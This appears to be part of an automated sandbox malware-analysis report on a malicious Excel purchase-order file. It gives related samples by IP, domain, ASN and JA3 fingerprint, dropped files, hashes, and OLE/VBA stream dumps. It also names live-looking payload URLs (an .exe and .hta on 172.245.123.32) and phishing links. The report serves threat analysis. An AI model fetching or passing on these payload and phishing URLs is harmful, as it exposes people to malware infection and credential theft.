                                    • 172.245.123.32/70/smss.exe
                                    Bank Information.xlsGet hashmaliciousUnknownBrowse
                                    • 172.245.123.32/xampp/nmo/givemebestthingsforgivemebest.hta
                                    Bank Information.xlsGet hashmaliciousUnknownBrowse
                                    • 172.245.123.32/xampp/nmo/givemebestthingsforgivemebest.hta
                                    Bank Information.xlsGet hashmaliciousUnknownBrowse
                                    • 172.245.123.32/xampp/nmo/givemebestthingsforgivemebest.hta

                                    Domains

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    s-part-0013.t-0009.t-msedge.netpython312.dllGet hashmaliciousUnknownBrowse
                                    • 13.107.246.41
                                    https://www.flugger.pl/Get hashmaliciousUnknownBrowse
                                    • 13.107.246.41
                                    https://www.flugger.plGet hashmaliciousUnknownBrowse
                                    • 13.107.246.41
                                    https://app.powerbi.com/view?r=eyJrIjoiZmVlZTQ2MzYtNjAyNC00NmIzLTljNjYtYmI2NDA2NjgzYTBkIiwidCI6IjcxOGNiYTc5LTYzNTAtNDMyZS04YjYwLTk2MDFiM2VhNDNiYSJ9Get hashmaliciousEvilProxy, HTMLPhisherBrowse
                                    • 13.107.246.41
                                    hmm_dec.exeGet hashmaliciousLummaC StealerBrowse
                                    • 13.107.246.41
                                    https://blackearthpavement-my.sharepoint.com/:f:/p/justin/Ers-Js2n9AROj9DUuizyNWABOVK5z1CJ653Ryc0SphjDRg?e=3ZQaIFGet hashmaliciousUnknownBrowse
                                    • 13.107.246.41
                                    http://adf-ask-accessibility-daeeafembaazdzfk.z01.azurefd.netGet hashmaliciousUnknownBrowse
                                    • 13.107.246.41
                                    http://ibuypetro-canada.comGet hashmaliciousUnknownBrowse
                                    • 13.107.246.41
                                    Setup.exeGet hashmaliciousUnknownBrowse
                                    • 13.107.246.41
                                    http://apreciouschild.orgGet hashmaliciousUnknownBrowse
                                    • 13.107.246.41
                                    agr.myList_242508-02.docx.docGet hashmaliciousUnknownBrowse
                                    • 147.79.86.93
                                    242508-02.docx.docGet hashmaliciousUnknownBrowse
                                    • 147.79.86.93
                                    List_242508-02.docx.docGet hashmaliciousUnknownBrowse
                                    • 147.79.86.93
                                    242508-02.docx.docGet hashmaliciousUnknownBrowse
                                    • 147.79.86.93
                                    ORDER 517-2025.xla.xlsxGet hashmaliciousUnknownBrowse
                                    • 147.79.86.93
                                    ORDER 517-2025.xla.xlsxGet hashmaliciousUnknownBrowse
                                    • 147.79.86.93
                                    ORDER 517-2025.xla.xlsxGet hashmaliciousUnknownBrowse
                                    • 147.79.86.93
                                    MDRHZBOL2477518 CO.xlsGet hashmaliciousUnknownBrowse
                                    • 147.79.86.93
                                    Merged documents.docx.docGet hashmaliciousUnknownBrowse
                                    • 147.79.86.93
                                    MDRHZBOL2477518 CO.xlsGet hashmaliciousUnknownBrowse
                                    • 147.79.86.93
                                    s-0005.dual-s-dc-msedge.netphish_alert_sp2_2.0.0.0-1.emlGet hashmaliciousUnknownBrowse
                                    • 52.123.131.14
                                    memebers.docGet hashmaliciousUnknownBrowse
                                    • 52.123.131.14
                                    PRE#U00c7O - RFQ 674441-76450.xla.xlsxGet hashmaliciousUnknownBrowse
                                    • 52.123.130.14
                                    Message.emlGet hashmaliciousUnknownBrowse
                                    • 52.123.130.14
                                    Message.emlGet hashmaliciousUnknownBrowse
                                    • 52.123.130.14
                                    Message.emlGet hashmaliciousUnknownBrowse
                                    • 52.123.130.14
                                    https://ecidf91-my.sharepoint.com/:o:/g/personal/coord_etudesetchantiers_org/EUmQMWGSyWxJn1UxHBfM5-0BIQy5Pwz-5xitaPNPxYfBxQ?rtime=HcHK-dRm3UgGet hashmaliciousUnknownBrowse
                                    • 52.123.131.14
                                    New Purchase Order.exeGet hashmaliciousMSIL Logger, MassLogger RAT, XRedBrowse
                                    • 52.123.130.14
                                    message__0XSkcQEiS5ehXOfhSk9JKw_geopod_ismtpd_30_.emlGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                    • 52.123.131.14
                                    Pre DA Lodgement and Contract.docxGet hashmaliciousUnknownBrowse
                                    • 52.123.130.14

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    EKSENBILISIMTRList_242508-02.docx.docGet hashmaliciousUnknownBrowse
                                    • 147.79.86.93
                                    242508-02.docx.docGet hashmaliciousUnknownBrowse
                                    • 147.79.86.93
                                    List_242508-02.docx.docGet hashmaliciousUnknownBrowse
                                    • 147.79.86.93
                                    242508-02.docx.docGet hashmaliciousUnknownBrowse
                                    • 147.79.86.93
                                    ORDER 517-2025.xla.xlsxGet hashmaliciousUnknownBrowse
                                    • 147.79.86.93
                                    ORDER 517-2025.xla.xlsxGet hashmaliciousUnknownBrowse
                                    • 147.79.86.93
                                    ORDER 517-2025.xla.xlsxGet hashmaliciousUnknownBrowse
                                    • 147.79.86.93
                                    MDRHZBOL2477518 CO.xlsGet hashmaliciousUnknownBrowse
                                    • 147.79.86.93
                                    Merged documents.docx.docGet hashmaliciousUnknownBrowse
                                    • 147.79.86.93
                                    MDRHZBOL2477518 CO.xlsGet hashmaliciousUnknownBrowse
                                    • 147.79.86.93
                                    MICROSOFT-CORP-MSN-AS-BLOCKUSphish_alert_sp2_2.0.0.0-1.emlGet hashmaliciousUnknownBrowse
                                    • 52.109.0.91
                                    FW_ FW_ DirectDeposit# 952759 _ Payment_ HSAAZDIXHI [ID_0024087].emlGet hashmaliciousInvisible JS, Tycoon2FABrowse
                                    • 20.189.173.18
                                    https://www.google.at/url?q=https%3A%2F%2Fsites.google.com%2Fview%2Fgfyhgfdgd%2Fhome&sa=D&sntz=1&usg=AOvVaw2V-B7GR4_wvs2FgIKvg5nYGet hashmaliciousHTMLPhisherBrowse
                                    • 51.11.192.50
                                    https://notedex.app/CardShare/2d6cdd7b-2589-4e00-9c06-b91087357b2dGet hashmaliciousUnknownBrowse
                                    • 52.176.165.69
                                    tHmLxo3S58.exeGet hashmaliciousLummaC Stealer, Stealc, VidarBrowse
                                    • 204.79.197.203
                                    https://www.google.com/url?q=https%3A%2F%2Fcsnrda.net%2Fun-plugins%2F&sa=D&sntz=1&usg=AOvVaw1HtbC798C9cvS3J1_HKx3j#?8407378349Family=a2lyc3RpZS5yZWVzQHF1aWx0ZXJjaGV2aW90LmNvbQ==Get hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                    • 20.190.190.196
                                    20250326_105213_E06iobGVLsebU2XlmUYXRv33mfADWIwk.emlGet hashmaliciousUnknownBrowse
                                    • 52.123.128.14
                                    20250326_105213_E06iobGVLsebU2XlmUYXRv33mfADWIwk.emlGet hashmaliciousUnknownBrowse
                                    • 52.123.129.14
                                    https://forms.office.com/e/tacqKUPtuAGet hashmaliciousInvisible JS, Tycoon2FABrowse
                                    • 13.107.42.14
                                    FW_ Malware_ [ID_0024077].emlGet hashmaliciousUnknownBrowse
                                    • 20.189.173.23
                                    AS-COLOCROSSINGUSrRYQiGZ4K3.exeGet hashmaliciousAmadey, Credential Flusher, Healer AV Disabler, LummaC Stealer, Stealc, VidarBrowse
                                    • 107.174.192.179
                                    a69aiSX97n.exeGet hashmaliciousAmadey, DarkVision Rat, LummaC StealerBrowse
                                    • 104.168.28.10
                                    ATitERlY7I.exeGet hashmaliciousScreenConnect Tool, Amadey, DarkVision Rat, LummaC StealerBrowse
                                    • 104.168.28.10
                                    goodgirlwithbestbattingwithgoodthings.htaGet hashmaliciousRemcosBrowse
                                    • 192.3.232.40
                                    givemebestthingsforgivemebest.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                    • 172.245.123.32
                                    globalshippingservice.htaGet hashmaliciousCobalt Strike, MSIL Logger, MassLogger RATBrowse
                                    • 107.174.231.211
                                    bestkissingdayswithgreatnicebeautygirlsareound.htaGet hashmaliciousCobalt Strike, AgentTeslaBrowse
                                    • 192.3.216.141
                                    file.exeGet hashmaliciousDarkVision RatBrowse
                                    • 104.168.28.10
                                    Bank Information.xlsGet hashmaliciousUnknownBrowse
                                    • 172.245.123.32
                                    Bank Information.xlsGet hashmaliciousUnknownBrowse
                                    • 172.245.123.32

                                    JA3 Fingerprints

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    6271f898ce5be7dd52b0fc260d0662b3List_242508-02.docx.docGet hashmaliciousUnknownBrowse
                                    • 147.79.86.93
                                    Bank Information.xlsGet hashmaliciousUnknownBrowse
                                    • 147.79.86.93
                                    ORDER 517-2025.xla.xlsxGet hashmaliciousUnknownBrowse
                                    • 147.79.86.93
                                    https://eu-central-1.protection.sophos.com/?d=klclick3.com&u=aHR0cHM6Ly9jdHJrLmtsY2xpY2szLmNvbS9sLzAxSlE2TldIMFdaVkdNV0tBODFNQkZGN1JUXzI=&p=m&i=NjcwOGRlNTQxNWVkNDAyNmUyZjA5MzFh&t=VUNaZ1Yza2szQkUxQ2V5U3gwNDYvRXh1ZWpOb1orVWYwMkVMRzFlQmtmMD0=&h=696c0b13c9bb46b2b210e89a34578cd9&s=AVNPUEhUT0NFTkNSWVBUSVbYlGfZU66j8K_UDSuTsyS5h7hisQMzbX-xxgbWnDCCvgGet hashmaliciousHTMLPhisherBrowse
                                    • 147.79.86.93
                                    ORDER 517-2025.xla.xlsxGet hashmaliciousUnknownBrowse
                                    • 147.79.86.93
                                    Bank Information.xlsGet hashmaliciousUnknownBrowse
                                    • 147.79.86.93
                                    MDRHZBOL2477518 CO.xlsGet hashmaliciousUnknownBrowse
                                    • 147.79.86.93
                                    Merged documents.docx.docGet hashmaliciousUnknownBrowse
                                    • 147.79.86.93
                                    ORDER 517-2025.xla.xlsxGet hashmaliciousUnknownBrowse
                                    • 147.79.86.93
                                    ORDER 517-2025.xla.xlsxGet hashmaliciousUnknownBrowse
                                    • 147.79.86.93
                                    a0e9f5d64349fb13191bc781f81f42e1Loader.exeGet hashmaliciousLummaCBrowse
                                    • 13.107.246.41
                                    4UuBoHs64W.exeGet hashmaliciousLummaC StealerBrowse
                                    • 13.107.246.41
                                    tHmLxo3S58.exeGet hashmaliciousLummaC Stealer, Stealc, VidarBrowse
                                    • 13.107.246.41
                                    4MlZyXN7Co.exeGet hashmaliciousLummaC StealerBrowse
                                    • 13.107.246.41
                                    3DTcqOJmxa.exeGet hashmaliciousLummaC StealerBrowse
                                    • 13.107.246.41
                                    hfRqL1uE9g.exeGet hashmaliciousLummaC StealerBrowse
                                    • 13.107.246.41
                                    YpN8Ya9e0I.exeGet hashmaliciousLummaC StealerBrowse
                                    • 13.107.246.41
                                    d#U043e.xlsmGet hashmaliciousUnknownBrowse
                                    • 13.107.246.41
                                    List_242508-02.docx.docGet hashmaliciousUnknownBrowse
                                    • 13.107.246.41
                                    242508-02.docx.docGet hashmaliciousUnknownBrowse
                                    • 13.107.246.41

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):118
                                    Entropy (8bit):3.5700810731231707
                                    Encrypted:false
                                    SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                    MD5:573220372DA4ED487441611079B623CD
                                    SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                    SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                    SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                    Malicious:false
                                    Reputation:high, very likely benign file
                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.

                                    C:\Users\user\AppData\Local\Temp\57CD7741.tmp

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):784
                                    Entropy (8bit):2.7137690747287806
                                    Encrypted:false
                                    SSDEEP:24:YIrNvpKAzLRwcfHGF8AJp9WtAZRJ5poIHWI:YmbfzLmc88AJtfJ52IHV
                                    MD5:09F73B3902CD3D88E04312787956B654
                                    SHA1:A6C275F1A65DB02D8A752C614C27E88326447C41
                                    SHA-256:72971990E5DC57AC8F4F27701158F6DC16E235814EA17DECA95E59CF5F60BC26
                                    SHA-512:6A68530BA4D4413B587E340CF871162036B6AC60AC0F969C07C70967C3102ADDE3C895BA6F1E2590D9D0C98C253ADFA33CA84E65106C3B56F506FE0E06F0ADA9
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    Preview:3.7.4.6.3.7.6.,.1.1.9.6.3.7.8.,.1.7.8.8.6.5.8.,.2.5.5.0.5.0.8.8.,.1.2.5.,.1.1.9.,.3.0.0.4.9.2.6.8.,.;.3.2.9.4.5.8.7.9.9.,.3.7.4.6.3.7.8.,.6.3.6.4.3.3.4.,.3.0.1.5.3.7.2.1.,.2.3.7.1.6.5.1.,.6.5.4.0.2.1.5.,.2.4.6.0.9.2.5.8.,.4.0.6.9.3.5.8.2.,.1.0.4.9.5.2.3.4.,.6.3.6.4.3.1.8.,.3.0.1.2.3.4.6.6.,.2.7.1.5.3.4.9.7.,.6.3.7.1.6.9.4.,.5.9.2.2.3.4.2.3.,.5.7.9.9.9.6.6.1.,.1.5.6.1.9.5.8.,.6.3.0.6.3.0.9.9.,.2.7.3.6.0.0.9.5.,.5.8.4.2.5.8.6.0.,.6.3.6.4.3.3.7.,.6.1.7.0.7.3.0.7.,.6.3.6.4.3.3.0.,.6.3.6.4.3.3.1.,.6.7.4.8.3.9.6.1.4.,.3.3.7.9.1.6.2.,.4.7.3.8.2.9.4.8.,.1.6.5.7.4.5.3.,.1.0.6.9.5.5.2.,.1.6.5.7.4.5.2.,.5.2.9.1.0.0.0.0.,.1.3.5.2.5.8.6.,.1.3.5.2.5.8.7.,.1.7.7.1.6.5.7.,.1.0.2.3.8.6.4.,.1.0.2.3.6.3.8.,.6.3.7.1.6.9.5.,.4.8.1.9.5.5.3.8.,.1.4.6.1.9.5.3.,.6.3.6.4.3.3.2.,.3.2.0.5.9.2.7.6.7.,.

                                    C:\Users\user\AppData\Local\Temp\~DF6511E61F39662CEC.TMP

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):512
                                    Entropy (8bit):0.0
                                    Encrypted:false
                                    SSDEEP:3::
                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                    Malicious:false
                                    Reputation:high, very likely benign file
                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\Desktop\~$PURCHASE ORDER 517-2025.xla.xlsx

                                    Download File
                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):165
                                    Entropy (8bit):1.7769794087092887
                                    Encrypted:false
                                    SSDEEP:3:iXKG/4N+RMlW8td:iXlMlW8/
                                    MD5:37BD8218D560948827D3B948CAFA579C
                                    SHA1:24347FB0A66F2DA8AD3BAB818E3C24977104E5DA
                                    SHA-256:189E2D5600E0CC41F498D2EB22FA451F81746DCDBAA3EC1146A22C3A74452DA6
                                    SHA-512:A34D703FEBFD9E45A57BF047D9CCF890482B0F7CD3788F9BFD89DECA13B96DD4F43BDB0C4D81CC716DEAC37BCD1C393A7BCB159B471B5721B367E4884B17C699
                                    Malicious:true
                                    Preview:.user ..f.r.o.n.t.d.e.s.k. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                    Static File Info

                                    General

                                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Mar 26 15:55:25 2025, Security: 1
                                    Entropy (8bit):7.975743789189764
                                    TrID:
                                    • Microsoft Excel sheet (30009/1) 47.99%
                                    • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                    • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                    File name:PURCHASE ORDER 517-2025.xla.xlsx
                                    File size:1'064'448 bytes
                                    MD5:4d57f2dfe4050bf6605af3c1be23d9e2
                                    SHA1:db1b4d7cd15f21378a456e7fdf49648b39ba731a
                                    SHA256:2edf703005001488ac02fe1c1b08784c938d944a5e8dd4345b00ea3d6e7b68f6
                                    SHA512:cb144e71faf5ef0582c4dcddf89cd0e4f264b3a6953309fd3d0e3294bbf3d8b45970c0a2362216f4acbf520e1a4647eb4b30bd4d7d94eb567c541f55be37e1cd
                                    SSDEEP:24576:zJIwgAIb3nOXYXKFlevIBoyK6wueeBbJYvH:zzgh7O7FlegBoy1deCqvH
                                    TLSH:C03523DABE947E53DB0B00B61B86C4AE540B7F9D264CE10B7634734A1537A6E80F583E
                                    File Content Preview:........................>...................................E...........................................................................h......................................................................................................................

                                    File Icon

                                    Icon Hash:35e58a8c0c8a85b9

                                    Static OLE Info

                                    General

                                    Document Type:OLE
                                    Number of OLE Files:1

                                    OLE File "PURCHASE ORDER 517-2025.xla.xlsx"

                                    Indicators
                                    Has Summary Info:
                                    Application Name:Microsoft Excel
                                    Encrypted Document:True
                                    Contains Word Document Stream:False
                                    Contains Workbook/Book Stream:True
                                    Contains PowerPoint Document Stream:False
                                    Contains Visio Document Stream:False
                                    Contains ObjectPool Stream:False
                                    Flash Objects Count:0
                                    Contains VBA Macros:True
                                    Summary
                                    Code Page:1252
                                    Author:
                                    Last Saved By:
                                    Create Time:2006-09-16 00:00:00
                                    Last Saved Time:2025-03-26 15:55:25
                                    Creating Application:Microsoft Excel
                                    Security:1
                                    Document Summary
                                    Document Code Page:1252
                                    Thumbnail Scaling Desired:False
                                    Contains Dirty Links:False
                                    Shared Document:False
                                    Changed Hyperlinks:False
                                    Application Version:786432
                                    General
                                    Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                    VBA File Name:Sheet1.cls
                                    Stream Size:977
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . X < ^ . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 58 3c 5e c3 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                    VBA Code
                                    Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                    General
                                    Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                    VBA File Name:Sheet2.cls
                                    Stream Size:977
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . X < . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 .
                                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 58 3c 0b 02 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                    VBA Code
                                    Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                    General
                                    Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                    VBA File Name:Sheet3.cls
                                    Stream Size:977
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . X < s . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 58 3c c2 73 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                    VBA Code
                                    Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                    General
                                    Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                    VBA File Name:ThisWorkbook.cls
                                    Stream Size:985
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . X < _ . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . -
                                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 58 3c 5f ee 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                    VBA Code
                                    Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                    General
                                    Stream Path:\x1CompObj
                                    CLSID:
                                    File Type:data
                                    Stream Size:114
                                    Entropy:4.25248375192737
                                    Base64 Encoded:True
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                    General
                                    Stream Path:\x5DocumentSummaryInformation
                                    CLSID:
                                    File Type:data
                                    Stream Size:244
                                    Entropy:2.889430592781307
                                    Base64 Encoded:False
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                    General
                                    Stream Path:\x5SummaryInformation
                                    CLSID:
                                    File Type:data
                                    Stream Size:200
                                    Entropy:3.2920681057018664
                                    Base64 Encoded:False
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . | g . . . . . . . . .
                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                    General
                                    Stream Path:MBD001A3105/\x1CompObj
                                    CLSID:
                                    File Type:data
                                    Stream Size:99
                                    Entropy:3.631242196770981
                                    Base64 Encoded:False
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                    General
                                    Stream Path:MBD001A3105/Package
                                    CLSID:
                                    File Type:Microsoft Excel 2007+
                                    Stream Size:943862
                                    Entropy:7.993297968973981
                                    Base64 Encoded:True
